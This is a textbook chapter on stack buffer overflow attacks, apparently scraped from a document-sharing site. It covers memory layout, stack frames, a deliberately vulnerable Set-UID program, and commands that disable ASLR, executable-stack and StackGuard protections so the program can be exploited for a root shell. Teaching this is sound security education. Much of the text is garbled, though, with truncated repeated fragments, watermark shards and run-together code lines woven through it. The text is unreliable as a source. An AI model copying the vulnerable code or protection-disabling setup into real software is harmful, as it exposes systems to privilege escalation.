37
Chapter 4 Buffer Overflow Attack From Morris worm in 1988, Code Red worm in 2001, SQL Slammer in 2003, to Stagefright attack against Android phones in 2015, the buffer overflow attack has played a significant role in the history of computer security. It is a classic attack that is still effective against many of the computer systems and applications. In this chapter, we will study the buffer overflow vulnerability, and see how such a simple mistake can be exploited by attackers to gain a complete control of a system. We will also study how to prevent such attacks. Contents 4.1 Program Memory Layout ......................... 64 4.2 Stack and Function Invocation ...................... 65 4.3 Stack Buffer-Overflow Attack ....................... 67 4.4 Setup for Our Experiment ......................... 71 4.5 Conduct Buffer-Overflow Attack ..................... 73 4.6 Attacks with Unknown Address and Buffer Size ............. 79 4.7 Writing a Shellcode ............................ 82 4.8 Countermeasures: Overview ....................... 86 4.9 Address Randomization .......................... 88 4.10 StackGuard ................................. 91 4.11 Defeating the Countermeasure in bash and dash ............ 96 4.12 Summary .................................. 98 Function fer-Overflow Attac Overflow A r Our Experiment . . r Experimen ct Buffer-Overflow Atta er-Overflow ks with Unknown Addr s with Unknown ing a Shellcode Shellcode ... untermeasures: Overvi measures: ddress Randomization s Randomiza tackGuard . uard . ..... ... Defeating the Counter ating the Counter Summary . . mmary . . .... m Chapter w Attack Attack Red worm in 2001, S d worm in 2 2015, the buffer overfl 2015, the buffer o rity. It is a classic att ty. It is a cl pplications. In this ch pplications. In th a simple mistake can b a simple mistak also study how to prev lso study how to C .. ..

Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

  • Upload
    others

  • View
    8

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

Chapter 4

Buffer Overflow Attack

From Morris worm in 1988, Code Red worm in 2001, SQL Slammer in 2003, to Stagefright

attack against Android phones in 2015, the buffer overflow attack has played a significant role

in the history of computer security. It is a classic attack that is still effective against many

of the computer systems and applications. In this chapter, we will study the buffer overflow

vulnerability, and see how such a simple mistake can be exploited by attackers to gain a complete

control of a system. We will also study how to prevent such attacks.

Contents4.1 Program Memory Layout . . . . . . . . . . . . . . . . . . . . . . . . . 644.2 Stack and Function Invocation . . . . . . . . . . . . . . . . . . . . . . 654.3 Stack Buffer-Overflow Attack . . . . . . . . . . . . . . . . . . . . . . . 674.4 Setup for Our Experiment . . . . . . . . . . . . . . . . . . . . . . . . . 714.5 Conduct Buffer-Overflow Attack . . . . . . . . . . . . . . . . . . . . . 734.6 Attacks with Unknown Address and Buffer Size . . . . . . . . . . . . . 794.7 Writing a Shellcode . . . . . . . . . . . . . . . . . . . . . . . . . . . . 824.8 Countermeasures: Overview . . . . . . . . . . . . . . . . . . . . . . . 864.9 Address Randomization . . . . . . . . . . . . . . . . . . . . . . . . . . 884.10 StackGuard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 914.11 Defeating the Countermeasure in bash and dash . . . . . . . . . . . . 964.12 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98

Functionfer-Overflow AttacOverflow A

r Our Experiment . .r Experimenct Buffer-Overflow Attaer-Overflow

ks with Unknown Addrs with Unknowning a ShellcodeShellcode . . .

untermeasures: Overvimeasures:ddress Randomizations RandomizatackGuard .uard . . . . . .. . .

Defeating the Counterating the CounterSummary . .mmary . . . . . .m

Chap

ter

w AttackAttack

Red worm in 2001, Sd worm in 2

2015, the buffer overfl2015, the buffer o

rity. It is a classic attty. It is a cl

pplications. In this chpplications. In th

a simple mistake can ba simple mistak

also study how to prevlso study how toC. . . .

Page 2: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

64 CHAPTER 4. BUFFER OVERFLOW ATTACK

4.1 Program Memory LayoutTo fully understand how buffer overflow attacks work, we need to understand how the data

memory is arranged inside a process. When a program runs, it needs memory space to store data.

For a typical C program, its memory is divided into five segments, each with its own purpose.

Figure 4.1 depicts the five segments in a process’s memory layout.

• Text segment: stores the executable code of the program. This block of memory is usually

read-only.

• Data segment: stores static/global variables that are initialized by the programmer. For

example, the variable a defined in static int a = 3 will be stored in the Data

segment.

• BSS segment: stores uninitialized static/global variables. This segment will be filled

with zeros by the operating system, so all the uninitialized variables are initialized with

zeros. For example, the variable b defined in static int b will be stored in the BSS

segment, and it is initialized with zero.

• Heap: The heap is used to provide space for dynamic memory allocation. This area is

managed by malloc, calloc, realloc, free, etc.

• Stack: The stack is used for storing local variables defined inside functions, as well as

storing data related to function calls, such as return address, arguments, etc. We will

provide more details about this segment later on.

Stack

Heap

(High address)

(Low address)

BSS segment

Data segment

Text segment

Figure 4.1: Program memory layout

To understand how different memory segments are used, let us look at the following code.

int x = 100; // In Data segmentint main(){

int a = 2; // In Stackfloat b = 2.5; // In Stack

Sam

ple

ampl

e m

pm

plele

amp

mp

Stack e

Heapple

p

ss) mmm

BSS segment

D

ext

igure 4.1: Program me4.1: Program

rent memory segmentent memory segm

S// In Data sSSSStac

Chap

terderstand how the dataand how the

mory space to store datspace to sto

ch with its own purpoth its own pu

block of memory is uof memory

alized by the programd by the prog

= 3 will be stored ine stored in

ables. This segment wThis segm

alized variables are ind variables a

ic int bint b will be stowill b

namic memory allocanamic memory a

reeree, etc.

iables defined insidebles defined ins

return address, argturn address

Page 3: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.2. STACK AND FUNCTION INVOCATION 65

static int y; // In BSS

// Allocate memory on Heapint *ptr = (int *) malloc(2*sizeof(int));

// values 5 and 6 stored on heapptr[0] = 5; // In Heapptr[1] = 6; // In Heap

free(ptr);return 1;

}

In the above program, the variable x is a global variable initialized inside the program;

this variable will be allocated in the Data segment. The variable y is a static variable that is

uninitialized, so it is allocated in the BSS segment. The variables a and b are local variables,

so they are stored on the program’s stack. The variable ptr is also a local variable, so it is

also stored on the stack. However, ptr is a pointer, pointing to a block of memory, which is

dynamically allocated using malloc(); therefore, when the values 5 and 6 are assigned to

ptr[0] and ptr[1], they are stored in the heap segment.

4.2 Stack and Function Invocation

Buffer overflow can happen on both stack and heap. The ways to exploit them are quite different.

In this chapter, we focus on the stack-based buffer overflow. To understand how it works, we

need to have an in-depth understanding of how stack works and what information is stored on

the stack.

Value of b

Value of a

Return Address

Previous Frame Pointer

Value of x

Value of y

Stack grows

(High address)

(Low address)

Arguments

Local variables

Current Frame Pointer

Figure 4.2: Layout for a function’s stack frame

4.2.1 Stack Memory Layout

Stack is used for storing data used in function invocations. A program executes as a series of

function calls. Whenever a function is called, some space is allocated for it on the stack for the

Sam

ple

n o

on the stack

h understanding of hoderstanding

ppppppp

Stack kgrowsws

mp

m

(High address

Current Current Frame FraPointer

Figur

2.1 Stack Memo.1 Stack M

sed for storid for

ene

Chap

terrerent));tep teptptpaple x is a global variabis a global v

Data segment. The vsegment. T

e BSS segment. The vegment. T

’s stack. The variableack. The va

r,r, ptrptr is a pointer, pois a pointe

lloc()oc(); therefore, w; ther

e stored in the heap sestored in the hea

nction Invocatction Invo

nd he

Page 4: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

66 CHAPTER 4. BUFFER OVERFLOW ATTACK

execution of the function. Consider the following sample code for function func(), which has

two integer arguments (a and b) and two integer local variables (x and y).

void func(int a, int b){

int x, y;

x = a + b;y = a - b;

}

When func() is called, a block of memory space will be allocated on the top of the stack,

and it is called stack frame. The layout of the stack frame is depicted in Figure 4.2. A stack

frame has four important regions:

• Arguments: This region stores the values for the arguments that are passed to the function.

In our case, func() has two integer arguments. When this function is called, e.g.,

func(5,8), the values of the arguments will be pushed into the stack, forming the

beginning of the stack frame. It should be noted that the arguments are pushed in the

reverse order; the reason will be discussed later after we introduce the frame pointer.

• Return Address: When the function finishes and hits its return instruction, it needs to

know where to return to, i.e., the return address needs to be stored somewhere. Before

jumping to the entrance of the function, the computer pushes the address of the next

instruction—the instruction placed right after the function invocation instruction—into

the top of the stack, which is the “return address” region in the stack frame.

• Previous Frame Pointer: The next item pushed into the stack frame by the program is the

frame pointer for the previous frame. We will talk about the frame pointer in more details

in §4.2.2.

• Local Variables: The next region is for storing the function’s local variables. The actual

layout for this region, such as the order of the local variables, the actual size of the region,

etc., is up to compilers. Some compilers may randomize the order of the local variables,

or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should

not assume any particular order or size for this region.

4.2.2 Frame PointerInside func(), we need to access the arguments and local variables. The only way to do that

is to know their memory addresses. Unfortunately, the addresses cannot be determined during

the compilation time, because compilers cannot predict the run-time status of the stack, and will

not be able to know where the stack frame will be. To solve this problem, a special register is

introduced in the CPU. It is called frame pointer. This register points to a fixed location in the

stack frame, so the address of each argument and local variable can be calculated using this

register and an offset. The offset can be decided during the compilation time, while the value of

the frame pointer can change during the runtime, depending on where a stack frame is allocated

on the stack.

Let us use an example to see how the frame pointer is used. From the code example shown

previously, the function needs to execute the x = a + b statement. CPU needs to fetch the

values of a and b, add them, and then store the result in x; CPU needs to know the addresses

Sam

ple

ddre

ushed into the stackd into the s

e will talk about the fratalk about t

or storing the functionstoring the f

der of the local variablethe local var

pilers may randomizes may rand

[Bryant and O’Hallaryant and O’H

or size for this region.for this regi

the arguments and loarguments an

es. Unfortunately, thenfortuna

mpilers cannot predicters cannot pr

stack frame will be. Tk frame will b

lled frame pointerframe point . Th

of each argument andargument

ffset can be decided duffset can be decid

ge during the runtime,ge during the run

e to see how the frameo see how the f

execute thexecut

re

Chap

terfunc()c(), which has,

). eetepte

ptpllocated on the top ofed on the top

depicted in Figure 4.2cted in Figure 4.2

ments that are passed tohat are pass

When this functionen this func

e pushed into the stacpushed into the

that the arguments arthat the arg

fter we introduce thefter we introduce

d hits itsd h returntur inst

ss needs to be storeds needs to be sto

computer pushes theomputer pushe

unction invocaunction i

the st

Page 5: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.3. STACK BUFFER-OVERFLOW ATTACK 67

of these three variables. As shown in Figure 4.2, in the x86 architecture, the frame pointer

register (ebp) always points to the region where the previous frame pointer is stored. For the

32-bit architecture, the return address and frame pointer both occupy 4 bytes of memory, so the

actual address of the variables a and b is ebp + 8, and ebp + 12, respectively. Therefore,

the assembly code for x = a + b is the following (we can compile C code into assembly

code using the -S option of gcc like this: gcc -S <filename>):

movl 12(%ebp), %eax ; b is stored in %ebp + 12movl 8(%ebp), %edx ; a is stored in %ebp + 8addl %edx, %eaxmovl %eax, -8(%ebp) ; x is stored in %ebp - 8

In the above assembly code, eax and edx are two general-purpose registers used for

storing temporary results. The "movl u w" instruction copies value u to w, while "addl%edx %eax" adds the values in the two registers, and save the result to %eax. The notation

12(%ebp) means %ebp+12. It should be noted that the variable x is actually allocated 8

bytes below the frame pointer by the compiler, not 4 bytes as what is shown in the diagram. As

we have already mentioned, the actual layout of the local variable region is up to the compiler.

In the assembly code, we can see from -8(%ebp) that the variable x is stored in the location

of %ebp-8. Therefore, using the frame pointer decided at the runtime and the offsets decided

at the compilation time, we can find the address of all the variables.

Now we can explain why a and b are pushed in the stack in a seemly reversed order.

Actually, the order is not reversed from the offset point of view. Since the stack grows from high

address to low address, if we push a first, the offset for argument a is going to be larger than the

offset of argument b, making the order look actually reversed if we read the assembly code.

Previous frame pointer and function call chain. In a typical program, we may call another

function from inside a function. Every time we enter a function, a stack frame is allocated on

the top of the stack; when we return from the function, the space allocated for the stack frame is

released. Figure 4.3 depicts the stack situation where from inside of main(), we call foo(),

and from inside of foo(), we call bar(). All three stack frames are on the stack.

There is only one frame pointer register, and it always points to the stack frame of the current

function. Therefore, before we enter bar(), the frame pointer points to the stack frame of the

foo() function; when we jump into bar(), the frame pointer will point to the stack frame of

the bar() function. If we do not remember what the frame pointer points to before entering

bar(), once we return from bar(), we will not be able to know where function foo()’s

stack frame is. To solve this problem, before entering the callee function, the caller’s frame

pointer value is stored in the “previous frame pointer” field on the stack. When the callee returns,

the value in this field will be used to set the frame pointer register, making it point to the caller’s

stack frame again.

4.3 Stack Buffer-Overflow AttackMemory copying is quite common in programs, where data from one place (source) need to

be copied to another place (destination). Before copying, a program needs to allocate memory

space for the destination. Sometimes, programmers may make mistakes and fail to allocate

sufficient amount of memory for the destination, so more data will be copied to the destination

buffer than the amount of allocated space. This will result in an overflow. Some programming

king

er and function call cd functiona function. Every timetion. Every

when we return from thwhen we return fro

depicts the stack situapicts the sta

foo()(), we call, we call barbone frame pointer regisrame pointe

ore, before we enterbefore we en bn; when we jump inton we jump in

nction. If we do not ren. If we do not re

e we return fromreturn from baris. To solve this probTo solve th

ue is stored in the “prevtored in the “

n this field will be uses field will

me again.gain.

Stack Bufferack Bufmory copying is quitemory copying is

copied to another placcopied to another

ace for the destinatioe for the destin

amount of mmount

ou

Chap

terin the x86 architecthe x8

the previous frame povious fram

pointer both occupy 4er both occup

+ 8, andan ebp + 12ebp +lowing (we can compg (we can c

cc -S <filenamec -S <filen

ptred in %epttored inppstored in

and edxedx are two geare two ge

l u w"w instruction cinstruct

e two registers, and saregisters, an

hould be noted that toted th

he compiler, not 4 bytempiler, not 4

ctual layout of the locctual layout of th

e from -8(%ebp)-8(%ebp th

he frame pointer decidhe frame pointer d

n find the address of an find the addre

hyy aa and b are pushee p

ersed from the offset ped from the offs

first, the offsfirst the

ok act

Page 6: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

68 CHAPTER 4. BUFFER OVERFLOW ATTACK

Stackgrows

(High address)

(Low address)

CurrentFramePointer

main()’s Frame Pointer

foo()’s Frame Pointerbar()

main()

foo()

Figure 4.3: Stack layout for function call chain

languages, such as Java, can automatically detect the problem when a buffer is over-run, but

many other languages such as C and C++ are not able to detect it. Most people may think that

the only damage a buffer overflow can cause is to crash a program, due to the corruption of the

data beyond the buffer; however, what is surprising is that such a simple mistake may enable

attackers to gain a complete control of a program, rather than simply crashing it. If a vulnerable

program runs with privileges, attackers will be able to gain those privileges. In this section, we

will explain how such an attack works.

4.3.1 Copy Data to Buffer

There are many functions in C that can be used to copy data, including strcpy(), strcat(),

memcpy(), etc. In the examples of this section, we will use strcpy(), which is used to copy

strings. An example is shown in the code below. The function strcpy() stops copying only

when it encounters the terminating character '\0'.

#include <string.h>#include <stdio.h>

void main (){

char src[40]="Hello world \0 Extra string";char dest[40];

// copy to dest (destination) from src (source)strcpy (dest, src);

}

When we run the above code, we can notice that strcpy() only copies the string "Helloworld" to the buffer dest, even though the entire string contains more than that. This

is because when making the copy, strcpy() stops when it sees number zero, which is

Sam

ple

ble to g

sed to copy data, includcopy data, i

ection, we will usen, we will use ste below. The functionow. The fun

acter ''\\0'0'.

mp

mmmamExtraamSa

tination) fr

SaSe code, we can noticecode, we can no

ven though tn tho

cp

Chap

ter

hapt

e

rentFramePointera

ion call chainion call chain

problem when a buffproblem when

e to detect it. Most pee to detect it. Mo

ash a program, due toh a program, du

g is that such a simplethat such a si

n simply crasi

vil

Page 7: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.3. STACK BUFFER-OVERFLOW ATTACK 69

represented by '\0' in the code. It should be noted that this is not the same as character '0',

which is represented as 0x30 in computers, not zero. Without the zero in the middle of the

string, the string copy will end when it reaches the end of the string, which is marked by a

zero (the zero is not shown in the code, but compilers will automatically add a zero to the end of

a string).

4.3.2 Buffer OverflowWhen we copy a string to a target buffer, what will happen if the string is longer than the size of

the buffer? Let us see the following example.

#include <string.h>

void foo(char *str){

char buffer[12];

/* The following statement will result in a buffer overflow */strcpy(buffer, str);

}

int main(){

char *str = "This is definitely longer than 12";foo(str);

return 1;}

The stack layout for the above code is shown in Figure 4.4. The local array buffer[] in

foo() has 12 bytes of memory. The foo() function uses strcpy() to copy the string from

str to buffer[]. The strcpy() function does not stop until it sees a zero (a number zero,

'\0') in the source string. Since the source string is longer than 12 bytes, strcpy() will

overwrite some portion of the stack above the buffer. This is called buffer overflow.

It should be noted that stacks grow from high address to low address, but buffers still grow

in the normal direction (i.e., from low to high). Therefore, when we copy data to buffer[],

we start from buffer[0], and eventually to buffer[11]. If there are still more data to be

copied, strcpy() will continue copying the data to the region above the buffer, treating the

memory beyond the buffer as buffer[12], buffer[13], and so on.

Consequence. As can be seen in Figure 4.4, the region above the buffer includes critical

values, including the return address and the previous frame pointer. The return address affects

where the program should jump to when the function returns. If the return address field is

modified due to a buffer overflow, when the function returns, it will return to a new place.

Several things can happen. First, the new address, which is a virtual address, may not be mapped

to any physical address, so the return instruction will fail, and the program will crash. Second,

the address may be mapped to a physical address, but the address space is protected, such as

those used by the operating system kernel; the jump will fail, and the program will crash. Third,

the address may be mapped to a physical address, but the data in that address is not a valid

machine instruction (e.g. it may be a data region); the return will again fail and the program

ee for the above code is sor the above code

of memory. Theof memory. The foo. The strcpy()trcpy( fun

ce string. Since the string. Sinc

ortion of the stack abon of the stac

noted that stacks growd that stacks

direction (i.e., from lowtion (i.e., from lo

buffer[0]fer[0], and eve, and eve

cpy()() will continuewil

yond the buffer asthe buffer a bu

ence. As can be seeAs can b

ncluding the return adding the retu

the program should jrogram sho

fied due to a buffer oe to a buff

ral things can happen.ral things can hap

ny physical address, sny physical addr

e address may be mapaddress may be

ose used by the operae used by the op

ss may be mmay

on

Chap

terd that this is not thet thi

zero. Without the zerWithout th

the end of the stringend of the st

pilers will automaticallwill automa

hat will happen if thewill happen

mple.

apaphahahement

ChChCCCdefiniteC

Page 8: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

70 CHAPTER 4. BUFFER OVERFLOW ATTACK

str (pointer)

Return Address

Previous Frame Pointer

buffer[0]

buffer[11]

Buffe

rcop

y

main()stackframe

foo()stackframe

Stackgrows

(High address)

(Low address)

Figure 4.4: Buffer overflow

will crash. Fourth, the data in the address may happen to be a valid machine instruction, so the

program will continue running, but the logic of the program will be different from the original

one.

4.3.3 Exploiting a Buffer Overflow VulnerabilityAs we can see from the above consequence, by overflowing a buffer, we can cause a program

to crash or to run some other code. From the attacker’s perspective, the latter sounds more

interesting, especially if we (as attackers) can control what code to run, because that will allow

us to hijack the execution of the program. If a program is privileged, being able to hijack the

program leads to privilege escalation for the attacker.

Let us see how we can get a vulnerable program to run our code. In the previous program

example, the program does not take any input from outside, so even though there is a buffer

overflow problem, attackers cannot take advantage of it. In real applications, programs usually

get inputs from users. See the following program example.

Listing 4.1: The vulnerable program (stack.c)

/* This program has a buffer overflow vulnerability. */#include <stdlib.h>#include <stdio.h>#include <string.h>

int foo(char *str){

char buffer[100];

/* The following statement has a buffer overflow problem */strcpy(buffer, str);

mpl

e Vulnerabilitylnerabilityby overflowing a buffby overflowing a

the attacker’s perspeche attacker’s pe

can control what codeol what c

m. If a program is privia program

the attacker.atta

able program to run oprogram to ru

any input from outsidenput from outsid

ake advantage of it. Indvantage of

wing program exampleprogra

The vulnerable progrvulne

amerflowamaSaSaSS; Smen

Chap

ter

hapt

erhahaahah

)

(Low ad

verflowverflow

en to be a valid machto be a valid m

am will be diffam will be

Page 9: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.4. SETUP FOR OUR EXPERIMENT 71

return 1;}

int main(int argc, char **argv){

char str[400];FILE *badfile;

badfile = fopen("badfile", "r");fread(str, sizeof(char), 300, badfile);foo(str);

printf("Returned Properly\n");return 1;

}

The above program reads 300 bytes of data from a file called "badfile", and then copies

the data to a buffer of size 100. Clearly, there is a buffer overflow problem. This time, the

contents copied to the buffer come from a user-provided file, i.e., users can control what is

copied to the buffer. The question is what to store in "badfile", so after overflowing the

buffer, we can get the program to run our code.

We need to get our code (i.e., malicious code) into the memory of the running program first.

This is not difficult. We can simply place our code in "badfile", so when the program reads

from the file, the code is loaded into the str[] array; when the program copies str to the

target buffer, the code will then be stored on the stack. In Figure 4.5, we place the malicious

code at the end of "badfile".

Next, we need to force the program to jump to our code, which is already in the memory. To

do that, using the buffer overflow problem in the code, we can overwrite the return address field.

If we know the address of our malicious code, we can simply use this address to overwrite the

return address field. Therefore, when the function foo returns, it will jump to the new address,

where our code is stored. Figure 4.5 illustrates how to get the program to jump to our code.

In theory, that is how a buffer overflow attack works. In practice, it is far more complicated.

In the next few sections, we will describe how to actually launch a buffer overflow attack against

the vulnerable Set-UID program described in Listing 4.1. We will describe the challenges in

the attack and how to overcome them. Our goal is to gain the root privilege by exploiting the

buffer overflow vulnerability in a privileged program.

4.4 Setup for Our Experiment

We will conduct attack experiments inside our Ubuntu16.04 virtual machine. Because the

buffer overflow problem has a long history, most operating systems have already developed

countermeasures against such an attack. To simplify our experiments, we first need to turn

off these countermeasures. Later on, we will turn them back on, and show that some of the

countermeasures only made attacks more difficult, not impossible. We will show how they can

be defeated.

Sam

ple ill then be s

dfile"le".

orce the program to jumhe program t

fer overflow problem ier overflow proble

ess of our malicious css of our ma

. Therefore, when therefore, when

stored. Figure 4.5 illued. Figure 4

at is how a buffer overflhow a buffer

sections, we will descr, we will des

Set-UID-UID program dprogram d

d how to overcome thw to overcom

ow vulnerability in a pvulnerabilit

Setup for Ourtup for O

will conduct attack expwill conduct attac

fer overflow problemfer overflow pro

untermeasures againsntermeasures ag

f these countermeasuhese counterm

easures onlysures

Chap

tererereteteptpt; pbadfile);

apap"); ahabytes of data from a filbytes of data from

Clearly, there is a buClearly, ther

ome from a user-provome from a user-

stion is what to storestion is what to

m to run our code.m to run our code

(i.e., malicious code)e., malicious co

ly place our cody place our

str[

Page 10: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

72 CHAPTER 4. BUFFER OVERFLOW ATTACK

Arguments

Return Address

Previous Frame Pointer

buffer[0]

buffer[99]

New Address

MaliciousCode

(badfile)

Arguments

buffer[0]

buffer[11]

MaliciousCode

New Return Address

ebp

(Overwrite)

(Overwrite)

(Overwrite)

Stack before the buffer copy Stack after the buffer copy

Figure 4.5: Insert and jump to malicious code

4.4.1 Disable Address Randomization

One of the countermeasures against buffer overflow attacks is the Address Space Layout

Randomization (ASLR) [Wikipedia, 2017b]. It randomizes the memory space of the key data

areas in a process, including the base of the executable and the positions of the stack, heap and

libraries, making it difficult for attackers to guess the address of the injected malicious code. We

will discuss this countermeasure in §4.9 and show how it can be defeated. For this experiment,

we will simply turn it off using the following command:

$ sudo sysctl -w kernel.randomize_va_space=0

4.4.2 Vulnerable Program

Our goal is to exploit a buffer overflow vulnerability in a Set-UID root program. A Set-UIDroot program runs with the root privilege when executed by a normal user, giving the normal

user extra privileges when running this program. The Set-UID mechanism is covered in

details in Chapter 1. If a buffer overflow vulnerability can be exploited in a privileged Set-UIDroot program, the injected malicious code, if executed, can run with the root’s privilege. We

will use the vulnerable program (stack.c) shown in Listing 4.1 as our target program. This

program can be compiled and turned into a root-owned Set-UID program using the following

commands:

$ gcc -o stack -z execstack -fno-stack-protector stack.c$ sudo chown root stack$ sudo chmod 4755 stack

The first command compiles stack.c, and the second and third commands turn the

executable stack into a root-owned Set-UID program. It should be noted that the order

Sam

ple

ando

cutable and thele and

ss the address of the ine address of

how how it can be defhow it can b

g command:command:

plspace=0

w vulnerability in anerability in Sevilege when executede when

g this program. Thes program.

rflow vulnerability canw vulne

ious code, if executedde, if exe

m (stack.cack.c) shown i) sho

urned into a root-ownd into a root-

Saecstack -fnoSac Sack

stack.cstact

Chap

ter

hapt

erh

erpp

hap

happt

ept

etete

rn s

apapp

ite)

Overwrite)

erwrite)

teptpte

opy

malicious codemalicious code

acks is the Aacks is

mo

Page 11: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.5. CONDUCT BUFFER-OVERFLOW ATTACK 73

of the second and third commands cannot be reversed, because when the chown command

changes the ownership of a file, it clears the Set-UID bit (for the sake of security). In the first

command, we used two gcc options to turn off two countermeasures that have already been

built into the gcc compiler.

• -z execstack: By default, stacks are non-executable, which prevents the injected

malicious code from getting executed. This countermeasure is called non-executable

stack [Wikipedia, 2017o]. A program, through a special marking in the binary, can tell the

operating system whether its stack should be set to executable or not. The marking in the

binary is typically done by the compiler. The gcc compiler marks stack as non-executable

by default, and the "-z execstack" option reverses that, making stack executable. It

should be noted that this countermeasure can be defeated using the return-to-libc attack.

We will cover the attack in Chapter 5.

• -fno-stack-protector: This option turns off another countermeasure called Stack-

Guard [Cowa et al., 1998], which can defeat the stack-based buffer overflow attack. Its

main idea is to add some special data and checking mechanisms to the code, so when a

buffer overflow occurs, it will be detected. More details of this countermeasure will be

explained in §4.10. This countermeasure has been built into the gcc compiler as a default

option. The -fno-stack-protector tells the compiler not to use the StackGuard

countermeasure.

To understand the behavior of this program, we place some random contents to badfile.

We can notice that when the size of the file is less than 100 bytes, the program will run without

a problem. However, when we put more than 100 bytes in the file, the program may crash. This

is what we expect when a buffer overflow happens. See the following experiment:

$ echo "aaaa" > badfile$ ./stackReturned Properly$$ echo "aaa ...(100 characters omitted)... aaa" > badfile$ ./stackSegmentation fault (core dumped)

4.5 Conduct Buffer-Overflow AttackOur goal is to exploit the buffer overflow vulnerability in the vulnerable program stack.c (List-

ing 4.1), which runs with the root privilege. We need to construct the badfile such that

when the program copies the file contents into a buffer, the buffer is overflown, and our injected

malicious code can be executed, allowing us to obtain a root shell. This section will first discuss

the challenges in the attack, followed by a breakdown of how we overcome the challenges.

4.5.1 Finding the Address of the Injected CodeTo be able to jump to our malicious code, we need to know the memory address of the malicious

code. Unfortunately, we do not know where exactly our malicious code is. We only know that

our code is copied into the target buffer on the stack, but we do not know the buffer’s memory

address, because its exact location depends on the program’s stack usage.

a buffer ov eile eley leplcharactpplt (core

nduct Buffer-Oct Buffeto exploit the buffer ovploit the buffe

which runs with the rh runs wi

program copies the filram copies th

us code can be executede can be exe

allenges in the attack, fes in the att

1 Finding the A1 Findingbe able to jump to ourbe able to jump to

de. Unfortunately, w. Unfortunatel

s copied intocopie

ts e

Chap

terrsed, because when, bec

UID bit (for the sake oit (for the s

two countermeasurescountermeas

are non-executable, wre non-executabl

d. This countermeasuThis counterm

through a special markgh a special

hould be set to executad be set to e

iler. TheThe gcc compilecom

ack" option reversesoption rever

measure can be defeature can be defeat

pter 5.5.

This option turns offoption turns

hich can defeat the stcan defeat th

ecial data and checkindata and ch

will be detected. Morewill be de

ountermeasure has beemeasure ha

ck-protectorck-protector tell

ior of this program, wr of this program

of the file is lessof the file i

than 10

Page 12: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

74 CHAPTER 4. BUFFER OVERFLOW ATTACK

We know the offset of the malicious code in our input, but we need to know the address of

the function foo’s stack frame to calculate exactly where our code will be stored. Unfortunately,

the target program is unlikely to print out the value of its frame pointer or the address of any

variable inside the frame, leaving us no choice but to guess. In theory, the entire search space for

a random guess is 232 addresses (for 32 bit machine), but in practice, the space is much smaller.

Two facts make the search space small. First, before countermeasures are introduced, most

operating systems place the stack (each process has one) at a fixed starting address. It should

be noted that the address is a virtual address, which is mapped to a different physical memory

address for different processes. Therefore, there is no conflict for different processes to use

the same virtual address for its stack. Second, most programs do not have a deep stack. From

Figure 4.3, we see that stack can grow deep if the function call chain is long, but this usually

happens in recursive function calls. Typically, call chains are not very long, so in most programs,

stacks are quite shallow. Combining the first and second facts, we can tell that the search space

is much smaller than 232, so guessing the correct address should be quite easy.

To verify that stacks always start from a fixed starting address, we use the following program

to print out the address of a local variable in a function.

#include <stdio.h>void func(int* a1){

printf(" :: a1’s address is 0x%x \n", (unsigned int) &a1);}

int main(){

int x = 3;func(&x);return 1;

}

We run the above program with the address randomization turned off. From the following

execution trace, we can see that the variable’s address is always the same, indicating that the

starting address for the stack is always the same.

$ sudo sysctl -w kernel.randomize_va_space=0kernel.randomize_va_space = 0$ gcc prog.c -o prog$ ./prog:: a1’s address is 0xbffff370

$ ./prog:: a1’s address is 0xbffff370

4.5.2 Improving Chances of GuessingFor our guess to be successful, we need to guess the exact entry point of our injected code. If

we miss by one byte, we fail. This can be improved if we can create many entry points for

our injected code. The idea is to add many No-Op (NOP) instructions before the actual entry

point of our code. The NOP instruction does not do anything meaningful, other than advancing

the program counter to the next location, so as long as we hit any of the NOP instructions,

Sam

pleee eedress randomization tuss randomiza

ble’s address is alwayaddress is al

e same.me. p_va_space

mp

mp

mm0 mam70

nces of Guessingnces of Guessisful, we need to guesssful, we need to

fail. This can be impfail. This can be

ea is to add many Nois to add many

uction does ntion d

s

hapt

er

know the address ofw the

stored. Unfortunately,Unfortuna

r or the address of anyhe address of

e entire search space fore search sp

he space is much smalce is much s

ures are introduced, mres are introduc

starting address. It shting address.

a different physical meerent physica

or different processesfferent proc

o not have a deep stachave a deep

l chain is long, but thiis long, but

t very long, so in mosty long, so in most

, we can tell that the scan tell that t

ould be quite easy.e quite easy

dress, we use the followwe use the f

ChChCC(unsigned iCCC

Page 13: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.5. CONDUCT BUFFER-OVERFLOW ATTACK 75

eventually, we will get to the actual starting point of our code. This will increase our success

rate very significantly. The idea is illustrated in Figure 4.6.

Arguments

buffer[0]

buffer[11]

Malicious Code

New Return Address

(Overwrite)

(Overwrite)

(Overwrite)

(Without NOP)

buffer[0]

buffer[11]

Malicious Code

New Return Address

(Overwrite)

(Overwrite)

(With NOP)

